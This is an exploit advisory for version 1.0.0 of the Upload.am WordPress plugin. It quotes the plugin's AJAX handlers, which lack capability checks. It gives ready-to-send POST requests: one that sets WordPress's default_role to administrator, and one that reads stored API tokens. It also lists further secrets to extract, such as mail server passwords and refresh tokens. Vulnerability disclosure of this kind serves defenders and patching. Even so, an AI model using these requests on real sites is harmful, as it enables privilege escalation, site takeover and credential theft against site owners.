# Exploit Title: Upload.am 1.0.0 WordPress Plugin - Multiple Vulnerabilities
# Date: Aug 12, 2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://wordpress.org/plugins/upload-am-file-hosting-vpn/
# Version: <= 1.0.0
# Tested on: MacOS, localhost xampp
# Authentication required: Low privilege




Critical: Unauthorized Settings Modification (CWE-862)
CVE-ID: N/A
CVSS: 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)
Affected File: upload-am-file-hosting-vpn.php:283-291

Vulnerable Code:
283: add_action('wp_ajax_upload_am_update_option', function () {
284:     check_ajax_referer('upload_am_nonce', 'nonce');
285:     if (!isset($_POST['option_name']) || !isset($_POST['option_value'])) {
286:         wp_send_json_error(['message' => 'Missing required parameters']);
287:     }
288:     $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
289:     $option_value = sanitize_text_field(wp_unslash($_POST['option_value']));
290:     update_option($option_name, $option_value);
291:     wp_send_json_success(['message' => 'Option updated']);

Input Source:
Parameter: $_POST['option_name'] and $_POST['option_value']
Flow: User input -> sanitize_text_field() -> update_option() with no capability check

Impact:
Complete WordPress configuration control allowing:
Privilege escalation (setting default_role to administrator)
Site takeover (modifying admin_email, siteurl)
Security bypass (disabling security plugins via active_plugins option)
Malicious redirections and content injection


POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_update_option&option_name=default_role&option_value=administrator&nonce=VALID_NONCE_HERE






============================================================================================================
High: Sensitive Information Disclosure (CWE-200)
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Affected File: upload-am-file-hosting-vpn.php:275-281
Vulnerable Code:
275: add_action('wp_ajax_upload_am_get_option', function () {
276:     check_ajax_referer('upload_am_nonce', 'nonce');
277:     if (!isset($_POST['option_name'])) {
278:         wp_send_json_error(['message' => 'Missing option_name']);
279:     }
280:     $option_name = sanitize_text_field(wp_unslash($_POST['option_name']));
281:     $value = get_option($option_name);
282:     wp_send_json_success($value);

Parameter: $_POST['option_name']
Flow: User input -> sanitize_text_field() -> get_option() -> JSON response

POC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com  
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=upload_am_access_token&nonce=VALID_NONCE_HERE

Additional sensitive options that can be extracted: 
option_name=mailserver_login
option_name=mailserver_pass  

# Site configuration
option_name=admin_email
option_name=users_can_register
option_name=active_plugins
option_name=siteurl
option_name=home

# Authentication tokens
option_name=upload_am_access_token
option_name=upload_am_refresh_token

Impact:
Exposure of sensitive WordPress configuration including:
API tokens and credentials
Plugin/theme configuration
Administrative email addresses
Site URLs and security settings